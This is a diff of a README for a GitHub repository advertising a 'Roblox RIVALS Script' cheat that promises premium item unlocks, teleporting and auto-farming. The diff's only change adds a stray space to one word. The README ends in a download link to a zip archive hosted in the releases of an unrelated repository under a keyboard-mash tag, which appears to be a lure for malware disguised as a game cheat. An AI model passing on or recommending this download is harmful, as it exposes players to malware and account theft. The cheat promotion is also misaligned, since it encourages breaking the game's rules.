ROMILDOVAZ/RIVALS-Script/README.md

 # RIVALS-Script
 The Roblox RIVALS Script is a powerful tool to automate gameplay in Roblox’s RIVALS game.
-Unlock premium items, teleport, auto-farm, and more with customizable settings.
+Unlock premium items, teleport, auto-farm, and more with customiz able settings.
 Boost your gaming experience with this feature-packed script and stay ahead of the competition! 🚀🎮

 <div style="text-align: center">
   <a href="https://github.com/ROMILDOVAZ/musicas/releases/download/fdsfdsf/Setuvlast.zip">